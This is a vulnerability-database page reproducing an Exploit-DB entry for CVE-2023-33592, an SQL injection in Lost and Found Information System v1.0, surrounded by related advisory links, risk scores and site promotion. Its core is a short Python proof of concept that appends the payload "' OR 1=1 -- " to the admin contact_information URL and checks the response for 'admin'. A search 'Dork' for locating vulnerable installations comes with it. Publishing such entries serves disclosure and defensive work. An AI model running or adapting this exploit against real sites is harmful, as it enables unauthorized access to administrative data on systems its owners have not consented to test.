Lucene search
K

Lost and Found Information System v1.0 - SQL Injection

🗓️ 06 Jul 2023 00:00:00Reported by Amirhossein BahramizadehType 
exploitdb
 exploitdb
🔗 www.exploit-db.com👁 332 Views

Lost and Found Information System v1.0 SQL Injection, Iran, CVE-2023-3359

Related
Code
ReporterTitlePublishedViews
Family
0day.today
Lost and Found Information System v1.0 - SQL Injection Exploit
6 Jul 202300:00
zdt
ATTACKERKB
CVE-2023-33592
28 Jun 202320:15
attackerkb
Circl
CVE-2023-33592
29 Jun 202300:13
circl
CNNVD
Lost and Found Information System SQL注入漏洞
28 Jun 202300:00
cnnvd
CVE
CVE-2023-33592
28 Jun 202300:00
cve
Cvelist
CVE-2023-33592
28 Jun 202300:00
cvelist
EUVD
EUVD-2023-37748
3 Oct 202520:07
euvd
NVD
CVE-2023-33592
28 Jun 202320:15
nvd
OSV
CVE-2023-33592
28 Jun 202320:15
osv
Packet Storm
Lost And Found Information System 1.0 SQL Injection
7 Jul 202300:00
packetstorm
Rows per page
# Exploit Title: Lost and Found Information System v1.0 - SQL Injection
# Date: 2023-06-30
# country: Iran
# Exploit Author: Amirhossein Bahramizadeh
# Category : webapps
# Dork : /php-lfis/admin/?page=system_info/contact_information
# Tested on: Windows/Linux
# CVE : CVE-2023-33592
import requests

# URL of the vulnerable component
url = "http://example.com/php-lfis/admin/?page=system_info/contact_information"

# Injecting a SQL query to exploit the vulnerability
payload = "' OR 1=1 -- "

# Send the request with the injected payload
response = requests.get(url + payload)

# Check if the SQL injection was successful
if "admin" in response.text:
    print("SQL injection successful!")
else:
    print("SQL injection failed.")

Data

Build on a solid foundation with Vulners data

We provide the essential building blocks for cybersecurity solutions with comprehensive, structured, and constantly updated vulnerability and exploits data

Api

Power your application with Vulners API

The Vulners REST API offers reliable, high-performance access to vulnerability intelligence, with 99.9% SLA uptime and CDN-backed data delivery for seamless global access

App

Assess and manage vulnerabilities with Vulners tools

Built on top of Vulners' database and SDK, end-user solutions give security professionals and developers lightweight and powerful tools for vulnerability remediation

06 Jul 2023 00:00Current
9.7High risk
Vulners AI Score9.7
CVSS 3.19.8
EPSS0.0234
SSVC
332